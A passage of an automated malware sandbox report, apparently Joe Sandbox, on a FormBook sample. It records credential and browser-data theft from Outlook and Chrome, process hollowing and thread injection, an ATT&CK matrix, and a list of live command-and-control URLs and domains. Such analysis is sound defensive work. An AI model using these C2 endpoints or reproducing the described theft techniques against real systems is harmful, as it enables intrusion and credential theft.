          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\535276_86376.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception512
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		1
          Input Capture          		2
          Process Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items2
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 873585 Sample: 535276_86376.exe Startdate: 23/05/2023 Architecture: WINDOWS Score: 100 36 Multi AV Scanner detection for domain / URL 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 42 3 other signatures 2->42 8 535276_86376.exe 3 2->8         started        process3 file4 26 C:\Users\user\...\535276_86376.exe.log, ASCII 8->26 dropped 11 535276_86376.exe 8->11         started        14 535276_86376.exe 8->14         started        16 535276_86376.exe 8->16         started        process5 signatures6 54 Modifies the context of a thread in another process (thread injection) 11->54 56 Maps a DLL or memory area into another process 11->56 58 Sample uses process hollowing technique 11->58 60 Queues an APC in another process (thread injection) 11->60 18 explorer.exe 1 11->18 injected process7 dnsIp8 28 www.berlinhealthweek.com 130.185.109.77, 49720, 80 XIRRADE Germany 18->28 30 www.jhg61.com 150.129.40.9, 49731, 49732, 49733 TELECOM-HKHongKongTelecomGlobalDataCentreHK Hong Kong 18->30 32 6 other IPs or domains 18->32 44 System process connects to network (likely due to code injection or exploit) 18->44 22 systray.exe 13 18->22         started        signatures9 process10 dnsIp11 34 www.jhg61.com 22->34 46 Tries to steal Mail credentials (via file / registry access) 22->46 48 Tries to harvest and steal browser information (history, passwords, etc) 22->48 50 Deletes itself after installation 22->50 52 2 other signatures 22->52 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          535276_86376.exe16%ReversingLabsWin32.Trojan.Pwsx
          535276_86376.exe32%VirustotalBrowse
          535276_86376.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          k-9999.k-msedge.net0%VirustotalBrowse
          www.berlinhealthweek.com1%VirustotalBrowse
          www.gomarketing.info8%VirustotalBrowse
          www.jhg61.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comjdd=UX4BZm100%Avira URL Cloudmalware
          https://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3100%Avira URL Cloudmalware
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZm100%Avira URL Cloudmalware
          http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.sakkal.comwc)k0%Avira URL Cloudsafe
          http://www.rt66omm.com0%Avira URL Cloudsafe
          http://www.bisarropainting.com/bpg5/www.bisarropainting.comjdd=UX4BZm0%Avira URL Cloudsafe
          http://www.fontbureau.comgrita0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.perkibeans.com/bpg5/0%Avira URL Cloudsafe
          http://www.thetowerbells.com/bpg5/100%Avira URL Cloudmalware
          http://www.mysparexrewards.com100%Avira URL Cloudmalware
          http://www.techwithsun.com/bpg5/www.techwithsun.com100%Avira URL Cloudmalware
          http://www.wearecatalyst.app/bpg5/100%Avira URL Cloudmalware
          http://www.perkibeans.com/bpg5/www.perkibeans.comjdd=UX4BZm0%Avira URL Cloudsafe
          http://www.42230.org/bpg5/www.42230.orgjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/iefBy9k0%Avira URL Cloudsafe
          http://www.rt66omm.com/bpg5/www.rt66omm.comjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.antalyabfe.com/bpg5/100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/staff/dennis.htmUc0%Avira URL Cloudsafe
          http://www.gomarketing.info100%Avira URL Cloudmalware
          http://www.perkibeans.com0%Avira URL Cloudsafe
          http://www.vns96.net0%Avira URL Cloudsafe
          http://www.gomarketing.info/bpg5/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/_y0%Avira URL Cloudsafe
          http://www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm100%Avira URL Cloudmalware
          http://www.haynicorpon.biz100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/Y0fBy9k0%Avira URL Cloudsafe
          http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.fontbureau.com=0%Avira URL Cloudsafe
          http://www.fontbureau.comalsd0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jhg61.com0%Avira URL Cloudsafe
          http://www.haynicorpon.biz/bpg5/100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com/bpg5/100%Avira URL Cloudmalware
          http://www.bisarropainting.comAD0%Avira URL Cloudsafe
          http://www.fontbureau.comoitu0%URL Reputationsafe
          http://www.fontbureau.comtly/kt0%Avira URL Cloudsafe
          http://www.mysparexrewards.com/bpg5/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/o0%URL Reputationsafe
          http://www.42230.orgI0%Avira URL Cloudsafe
          http://www.fabricadepack.fun/bpg5/www.fabricadepack.funjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.gomarketing.info/bpg5/www.gomarketing.infojdd=UX4BZm100%Avira URL Cloudmalware
          http://www.fontbureau.comtued0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
          http://www.founder.com.cn/cnT0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.thetowerbells.com0%Avira URL Cloudsafe
          http://www.fontbureau.comiona0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Iyk0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.comsiva0%URL Reputationsafe
          http://www.rt66omm.com/bpg5/100%Avira URL Cloudmalware
          http://www.vns96.net/bpg5/www.vns96.netjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.antalyabfe.com/bpg5/www.antalyabfe.comjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.fontbureau.comFIyk0%Avira URL Cloudsafe
          http://www.fontbureau.comdsed:yqk0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ey$ku0%Avira URL Cloudsafe
          http://www.berlinhealthweek.com100%Avira URL Cloudmalware
          http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.jhg61.com/bpg5/100%Avira URL Cloudmalware
          http://www.techwithsun.com100%Avira URL Cloudmalware
          http://www.bisarropainting.com0%Avira URL Cloudsafe
          http://www.fontbureau.comF:yqk0%Avira URL Cloudsafe
          http://www.rt66omm.com/bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZm100%Avira URL Cloudmalware
          http://www.jhg61.com/bpg5/www.jhg61.comjdd=UX4BZm100%Avira URL Cloudmalware
          http://www.sajatypeworks.comR0%Avira URL Cloudsafe
          http://www.musicandgros.com/bpg5/?yDcF=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwSdmK2gNTOclalNw==&jdd=UX4BZm100%Avira URL Cloudmalware
          http://www.antalyabfe.com0%Avira URL Cloudsafe
          http://www.fontbureau.comd:yqk0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/Iyk0%Avira URL Cloudsafe
          http://www.wearecatalyst.app0%Avira URL Cloudsafe
          http://www.gomarketing.info/bpg5/?yDcF=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCON7RUUDcju2gY5A==&jdd=UX4BZm100%Avira URL Cloudmalware
          http://www.fabricadepack.fun0%Avira URL Cloudsafe
          http://www.techwithsun.com/bpg5/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/ly/kt0%Avira URL Cloudsafe
          http://www.haynicorpon.biz/bpg5/www.haynicorpon.biz100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          k-9999.k-msedge.net
          		13.107.18.254
          		truefalseunknown
          www.berlinhealthweek.com
          		130.185.109.77
          		truetrueunknown
          www.gomarketing.info
          		198.177.124.57
          		truetrueunknown
          www.antalyabfe.com
          		188.114.97.7
          		truetrue
            		unknown
            www.rt66omm.com
            		118.27.125.172
